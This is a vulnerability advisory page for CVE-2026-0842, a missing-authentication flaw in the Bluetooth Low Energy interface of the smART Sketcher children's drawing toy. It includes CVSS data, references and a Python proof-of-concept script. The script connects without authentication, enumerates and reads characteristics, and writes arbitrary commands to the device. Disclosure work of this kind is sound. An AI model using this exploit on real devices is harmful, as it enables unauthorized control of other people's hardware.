Security Vulnerability Report
中文
CVE-2026-0842 CVSS 6.3 MEDIUM

CVE-2026-0842

Published: 2026-01-11 08:16:00
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A flaw has been found in Flycatcher Toys smART Sketcher up to 2.0. This affects an unknown part of the component Bluetooth Low Energy Interface. This manipulation causes missing authentication. The attack can only be done within the local network. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Flycatcher Toys smART Sketcher <= 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
""" CVE-2026-0842 PoC - smART Sketcher BLE Authentication Bypass This script demonstrates the missing authentication vulnerability in Flycatcher Toys smART Sketcher BLE interface. Note: This code is for educational and security research purposes only. """ from bluepy.btle import Peripheral, UUID, BTLEException import sys def connect_to_smart_sketcher(mac_address): """ Connect to smART Sketcher device without authentication CVE-2026-0842: Missing authentication in BLE interface """ try: print(f"[*] Connecting to smART Sketcher at {mac_address}...") device = Peripheral(mac_address, addrType='random') print("[+] Successfully connected without authentication!") print("[!] Vulnerability CVE-2026-0842 confirmed: No authentication required") # List available services print("\n[*] Enumerating BLE services...") for service in device.getServices(): print(f"[Service] {service.uuid}: {service}") for characteristic in service.getCharacteristics(): print(f" [Char] {characteristic.uuid} - Properties: {characteristic.propertiesToString()}") # Try to read/write characteristics without auth try: if characteristic.supportsRead(): value = characteristic.read() print(f" [READ] {value}") except BTLEException as e: print(f" [READ FAILED] {e}") device.disconnect() return True except BTLEException as e: print(f"[-] Connection failed: {e}") return False def send_unauthorized_command(mac_address, command): """ Send commands to device without authorization """ try: device = Peripheral(mac_address, addrType='random') # Find command characteristic (UUID would need to be discovered) service_uuid = UUID("0000fff0-0000-1000-8000-00805f9b34fb") char_uuid = UUID("0000fff1-0000-1000-8000-00805f9b34fb") service = device.getServiceByUUID(service_uuid) characteristic = service.getCharacteristics(char_uuid)[0] # Write without authentication characteristic.write(command) print(f"[+] Command sent without authorization: {command.hex()}") device.disconnect() return True except Exception as e: print(f"[-] Command failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python smartsketch_poc.py <MAC_ADDRESS>") print("Example: python smartsketch_poc.py AA:BB:CC:DD:EE:FF") sys.exit(1) target_mac = sys.argv[1] connect_to_smart_sketcher(target_mac)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0842", "sourceIdentifier": "[email protected]", "published": "2026-01-11T08:16:00.150", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Flycatcher Toys smART Sketcher up to 2.0. This affects an unknown part of the component Bluetooth Low Energy Interface. This manipulation causes missing authentication. The attack can only be done within the local network. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado un fallo en Flycatcher Toys smART Sketcher hasta la versión 2.0. Esto afecta a una parte desconocida del componente Interfaz Bluetooth de Baja Energía. Esta manipulación provoca ausencia de autenticación. El ataque solo puede realizarse dentro de la red local. El exploit ha sido publicado y puede ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.5, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/davidrxchester/smart-sketcher-upload/blob/main/smartsketch-upload.py", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.340442", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.340442", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.729134", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.